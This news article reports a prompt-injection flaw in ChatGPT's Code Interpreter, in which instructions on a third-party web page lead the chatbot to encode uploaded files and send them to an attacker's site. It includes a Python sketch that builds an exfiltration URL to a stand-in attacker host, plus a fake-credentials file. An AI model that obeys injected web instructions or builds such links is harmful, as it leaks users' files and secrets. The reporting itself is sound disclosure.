Thanks to new ChatGPT updates like the Code Interpreter, OpenAI's popular generative artificial intelligence faces fresh security concerns. According to research from security expert Johann Rehberger (and follow-up work from Tom's Hardware), ChatGPT has glaring security flaws that stem from its new file-upload feature.
OpenAI's recent update to ChatGPT Plus added a myriad of new features, including DALL-E image generation and the Code Interpreter, which allows Python code execution and file analysis. The code is created and run in a sandbox environment that is unfortunately vulnerable to prompt injection attacks.
The attack exploits a vulnerability that has been known in ChatGPT for some time: the chatbot can be tricked into executing instructions from a third-party URL, leading it to encode uploaded files into a URL-friendly string and send that data to a malicious website. While such an attack requires specific conditions (e.g., the user must actively paste a malicious URL into ChatGPT), the risk remains concerning. This security threat could be realized through various scenarios, including a trusted website being compromised with a malicious prompt, or through social engineering tactics.
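To illustrate the mechanics, here is a minimal, hypothetical sketch (in Python, the language the Code Interpreter runs) of the kind of operation an injected prompt asks for: read an uploaded file, encode it into a URL-safe string, and fold it into a link pointing at an attacker-controlled server. The file path and domain below are placeholders, not details from Rehberger's research.

```python
import base64
from urllib.parse import quote

# Hypothetical sketch only: the path and domain are placeholders, not details
# taken from the actual research.
UPLOADED_FILE = "/mnt/data/uploaded_file.txt"           # where user uploads typically land in the sandbox
ATTACKER_ENDPOINT = "https://attacker.example/collect"  # attacker-controlled server (hypothetical)

# Read the file the user uploaded for "analysis".
with open(UPLOADED_FILE, "rb") as f:
    contents = f.read()

# Encode the contents into a URL-friendly string.
payload = base64.urlsafe_b64encode(contents).decode("ascii")

# Fold the encoded data into a link; the leak happens if ChatGPT can be
# persuaded to send a request to this URL.
exfil_url = f"{ATTACKER_ENDPOINT}?data={quote(payload)}"
print(exfil_url)
```

The encoding step matters because it lets arbitrary file contents ride along as an ordinary-looking query parameter on a request to the attacker's server.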
Tom's Hardware did some impressive work testing just how vulnerable users may be to this attack. The exploit was tested by creating a fake environment-variables file and prompting ChatGPT to process it, inadvertently sending the data to an external server. Although the exploit's effectiveness varied across sessions (for example, ChatGPT sometimes refused to load external pages or transmit file data), it raises significant security concerns, especially given the AI's ability to read and execute Linux commands and handle user-uploaded files in a Linux-based virtual environment.
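For a sense of what that test setup looked like, here is a hypothetical recreation of the dummy file: a handful of fake credentials written to an environment-variables file before upload. The variable names and values are invented for illustration and are not the ones Tom's Hardware used.

```python
# Invented example of a dummy environment-variables file like the one used in
# testing; none of these values are real secrets.
fake_env = (
    "API_KEY=sk-test-0000000000000000\n"
    "DB_PASSWORD=not-a-real-password\n"
    "AWS_SECRET_ACCESS_KEY=EXAMPLEKEY1234567890\n"
)

with open("fake.env", "w") as f:
    f.write(fake_env)
```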
As Tom's Hardware states in its findings, the existence of this security loophole is significant even if exploitation seems unlikely. ChatGPT should ideally not execute instructions from external web pages, yet it does. Mashable reached out to OpenAI for comment, but it did not immediately respond to our request.
Topics: Artificial Intelligence, ChatGPT, OpenAI